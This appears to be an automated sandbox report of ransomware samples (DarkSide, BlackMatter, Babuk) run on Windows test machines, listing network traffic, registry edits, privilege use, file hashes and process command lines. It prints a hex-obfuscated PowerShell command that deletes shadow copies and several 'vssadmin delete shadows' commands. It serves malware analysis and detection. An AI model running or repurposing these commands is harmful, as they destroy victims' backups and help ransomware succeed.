US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.52:445 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp

Files

C:\Program Files\dotnet\Restore-My-Files.txt

MD5 46f50803b898dfb71ae8eb621e2b62c7
SHA1 51f60385a1ac416587ea3189b1a594a548f88dd4
SHA256 8934bcbf7e6052ceb5e9aa922c0de31bc1f10871f79adcca40aa2a628516a687
SHA512 a785241e4bdacb153349806845b77e9a61a35aaf4ace650272e4f2626c3ce058670a067a98ff4ed41e31c78c82f136f16ecb37e83c1c2745e0b3782804a940e5

Analysis: behavioral17

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

36s

Max time network

44s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (154) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\b77a682a.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\b77a682a.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\b77a682a C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\b77a682a\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\b77a682a.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.b77a682a C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.b77a682a\ = "b77a682a" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\b77a682a\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 catsdegree.com udp
US 76.223.54.146:443 catsdegree.com tcp
US 76.223.54.146:443 catsdegree.com tcp

Files

memory/2556-0-0x0000000000B60000-0x0000000000B77000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4971.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar49A3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2592-40-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmp

memory/2592-41-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/2592-42-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2592-43-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-44-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-45-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-46-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-47-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2556-48-0x0000000000B60000-0x0000000000B77000-memory.dmp

memory/2592-49-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9d57aee5a20d538519285afa6bfe2a47
SHA1 264bf62f85431714c4ad638108b75826d11b5162
SHA256 a469c660dfc226d2ab1ed8520f63bc5d187948b58cc39ebe63ea00a45a7cff1f
SHA512 b8671a43a2498dbb709dea7d3e333aa8eb7de9cdd6573e6fb56ead6ae3f4f010e27ca49baa1a1a41968a787b197a16c997b1d7304e66e7ffabfd64082598e8f2

C:\Users\Admin\README.b77a682a.TXT

MD5 f418a249405444da33cc73b402a26306
SHA1 1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256 b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512 b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/2556-244-0x0000000000B60000-0x0000000000B77000-memory.dmp

memory/2556-245-0x0000000000B60000-0x0000000000B77000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d9ed20126a7ce73632e80090dfa6d744
SHA1 ccb251335adc910eb7437b8e83e3c216b053df37
SHA256 566d47d224ff248be4e94d66df0934167dda7fd129228ec13a19bf9b4713731c
SHA512 3609267c3fe69642e59527f67c38369793365943777715f07a66aaacd1e5a30c91fefce66106afe0ed996ce5677a694b3ae58c058ba924205507896b3c146d1a

memory/2556-284-0x0000000000B60000-0x0000000000B77000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (163) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\mINyMTFyg.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\mINyMTFyg.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 paymenthacks.com udp
US 204.11.56.48:443 paymenthacks.com tcp
US 204.11.56.48:80 paymenthacks.com tcp
US 8.8.8.8:53 mojobiden.com udp
US 3.33.130.190:443 mojobiden.com tcp
US 3.33.130.190:80 mojobiden.com tcp
US 204.11.56.48:443 paymenthacks.com tcp
US 204.11.56.48:80 paymenthacks.com tcp
US 3.33.130.190:443 mojobiden.com tcp
US 3.33.130.190:80 mojobiden.com tcp

Files

memory/2112-0-0x0000000000AA0000-0x0000000000AE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabFD26.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarFF3B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\mINyMTFyg.README.txt

MD5 f66968c47a64569e2281f65a95991be0
SHA1 ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512 cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

126s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (171) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country Destination Domain Proto

Files

C:\Users\Admin\How To Restore Your Files.txt

MD5 81fc4c91a0938482f65a72216cda1e39
SHA1 3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512 ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral12

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

137s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (152) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\pqIiT08io.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\pqIiT08io.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
